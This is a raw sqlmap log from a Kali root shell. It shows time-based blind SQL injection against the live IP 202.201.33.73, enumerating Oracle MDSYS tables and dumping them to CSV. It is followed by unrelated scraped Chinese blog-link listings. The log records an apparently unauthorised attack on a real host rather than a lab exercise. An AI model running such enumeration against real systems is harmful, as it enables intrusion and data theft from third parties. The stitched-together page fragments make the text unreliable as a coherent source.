[11:45:47] [INFO] the SQL query used returns 4 entries
[11:45:47] [INFO] resumed: "SDO_OWNER","VARCHAR2"
[11:45:47] [INFO] resumed: "NAME","VARCHAR2"
[11:45:47] [INFO] resumed: "DESCRIPTION","VARCHAR2"
[11:45:47] [INFO] resumed: "DEFINITION","CLOB"
[11:45:47] [INFO] fetching entries for table 'SDO_MAPS_TABLE' in database 'MDSYS'
[11:45:47] [INFO] fetching number of entries for table 'SDO_MAPS_TABLE' in database 'MDSYS'
[11:45:47] [INFO] resumed: 0
[11:45:47] [WARNING] table 'SDO_MAPS_TABLE' in database 'MDSYS' appears to be empty
Database: MDSYS
Table: SDO_MAPS_TABLE
[0 entries]
+------+-----------+------------+-------------+
| NAME | SDO_OWNER | DEFINITION | DESCRIPTION |
+------+-----------+------------+-------------+
+------+-----------+------------+-------------+
[11:45:47] [INFO] table 'MDSYS.SDO_MAPS_TABLE' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/MDSYS/SDO_MAPS_TABLE.csv'
[11:45:47] [INFO] fetching columns for table 'CS_SRS' in database 'MDSYS'
[11:45:47] [INFO] the SQL query used returns 6 entries
[11:45:47] [INFO] resumed: "CS_NAME","VARCHAR2"
[11:45:47] [INFO] resumed: "SRID","NUMBER"
[11:45:47] [INFO] resumed: "AUTH_SRID","NUMBER"
[11:45:47] [INFO] resumed: "AUTH_NAME","VARCHAR2"
[11:45:47] [INFO] resumed: "WKTEXT","VARCHAR2"
[11:45:47] [INFO] resumed: "CS_BOUNDS","SDO_GEOMETRY"
[11:45:47] [INFO] fetching entries for table 'CS_SRS' in database 'MDSYS'
[11:45:47] [INFO] the SQL query used returns 1000 entries
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
^C
[11:48:11] [WARNING] user aborted during enumeration. sqlmap will display partial output
[11:48:11] [INFO] fetching number of entries for table 'CS_SRS' in database 'MDSYS'
[11:48:11] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:48:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
1000
[11:49:19] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
University of Arizona
[11:55:51] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
20
[11:56:40] [ERROR] invalid character detected. retrying..
0
[11:57:00] [ERROR] invalid character detected. retrying..
0001
[11:57:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
Martian Longitude/Latitude
[12:05:35] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
2000001
[12:06:52] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[12:07:16] [ERROR] invalid character detected. retrying..
GEOGCS [ "Mar
[12:11:45] [ERROR] invalid character detected. retrying..
tian Lon^C
[12:14:39] [WARNING] Ctrl+C detected in dumping phase
Database: MDSYS
Table: CS_SRS
[0 entries]
+---------+-----------+--------+----------------------------+-----------------------+-----------+
| SRID | AUTH_SRID | WKTEXT | CS_NAME | AUTH_NAME | CS_BOUNDS |
+---------+-----------+--------+----------------------------+-----------------------+-----------+
+---------+-----------+--------+----------------------------+-----------------------+-----------+
[12:14:39] [INFO] table 'MDSYS.CS_SRS' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/MDSYS/CS_SRS.csv'
[12:14:39] [INFO] fetching columns for table 'SDO_PROJECTIONS' in database 'MDSYS'
[12:14:40] [INFO] the SQL query used returns 1 entries
[12:14:40] [INFO] fetching entries for table 'SDO_PROJECTIONS' in database 'MDSYS'
[12:14:40] [INFO] fetching number of entries for table 'SDO_PROJECTIONS' in database 'MDSYS'
[12:14:40] [WARNING] (case) time-based comparison requires larger statistical model, please wait...^X..........^C....^C
[12:14:46] [ERROR] user aborted
[*] shutting down at 12:14:46
root@kali-yaming:~#
sqlmap实例文档的更多相关文章
- XML实例文档
from: http://www.w3school.com.cn/xpath/xpath_examples.asp XML实例文档 我们将在下面的例子中使用这个 XML 文档: "books ...
- ZooKeeper----Java实例文档
**************************************************************************************************** ...
- RSS实例文档
<?xml version="1.0" encoding="ISO-8859-1" ?> <rss version="2.0&quo ...
- Visual FoxPro 6.0~9.0解决方案和实例文档和CD写入原件下载
自从微软宣布开发冻结Visual FoxPro之后,这样的图书出版已经成为一个问题,但仍有不少VFP小贴士.处处留心此8历史书.在此提供写作的原稿.它看起来非常舒服比扫描版淘宝.下载链接:http:/ ...
- 产品需求文档写作方法(三)用例文档(UML用例图、流程图)
在产品和技术领域里都有UML的技能知识,而对于产品人员的UML则更多的是指用例图,也就是我所称呼的用户流程图.在讲PRD文档写作的第二篇文章里,我提到了用户流程图的制作,实际上用户流程图是我在产品规则 ...
- 浅谈用java解析xml文档(三)
接上一篇,本文介绍使用JDOM解析xml文档, 首先我们还是应该知道JDOM从何而来,是Breet Mclaughlin和Jason Hunter两大Java高手的创作成果,2000年初, JDOM作 ...
- Android APP开发需求文档范本
Android APP开发需求文档范本 软件需求文档格式的标准写法 1.引言 1.1 编写目的 • 阐明开发本软件的目的: 1.2 项目背景 • 标识待开发软件产品的名称.代码: • 列出本项目的任 ...
- 通过XmlDocument读写Xml文档参考地址
/// <summary> /// 获取一个报表的参数 http://blog.csdn.net/hdhai9451/article/details/12170069 /// </s ...
- app开发需求文档怎么写
我们在开发app前都会做需求分析,这个app开发需求文档怎么写呢?一般可以从这几点入手:确定APP方案的目标,APP方案的受众分析,APP开发方案功能设计,APP的操作系统说明方案,APP是是否是原生 ...
随机推荐
- npm 常用命令详解(转载)
学习gulp的使用时,对npm的掌握是必不可少的,经常到npm官网查询文档让我感到不爽,还不如整理了一些常用的命令博客上,于是根据自己的理解简单翻译过来,终于有点输出,想学习npm这块的朋友不可错过这 ...
- L3-1 二叉搜索树的结构 (30 分)
讲解的很不错的链接:https://blog.csdn.net/chudongfang2015/article/details/79446477#commentBox 题目链接:https://pin ...
- 转:Java项目开发规范参考
Java项目开发规范参考 - KevinLee的博客 - 博客频道 - CSDN.NEThttp://blog.csdn.net/u011383131/article/details/51227860 ...
- hibernate 嵌套事务
hibernate 嵌套事务,多线程调试.问题麻烦啊,后续有时间补全.
- NandFlash和iNand【转】
转自:https://www.cnblogs.com/PengfeiSong/p/6380447.html nand 1.nand的单元组织:block与page(大页Nand与小页Nand)(1)N ...
- linux 用户空间获得纳秒级时间ns【转】
转自:https://www.cnblogs.com/kekukele/p/3662816.html 一.引言 我们在测试程序的性能的时候往往需要获得ns级的精确时间去衡量一个程序的性能,下面介绍下l ...
- 10 个 MySQL 经典错误【转】
Top 1:Too many connections(连接数过多,导致连接不上数据库,业务无法正常进行) 问题还原 mysql> show variables like '%max_connec ...
- 【转】判断处理器是Big_endian的还是Little_endian的
首先说明一下Little_endian和Big_endian是怎么回事. Little_endian模式的CPU对操作数的存放方式是从低字节到高字节,而Big_endian模式则是从高字节到低字节,比 ...
- hibernate框架学习之数据查询(HQL)helloworld
package cn.itcast.h3.hql; import java.util.List; import org.hibernate.Query; import org.hibernate.Se ...
- QT 开发小记
1.开发socket网络通信时,需要在.pro 文件中添加 network项 QT += network 2. 报错: mutilple definition of 时,查看 .pro ...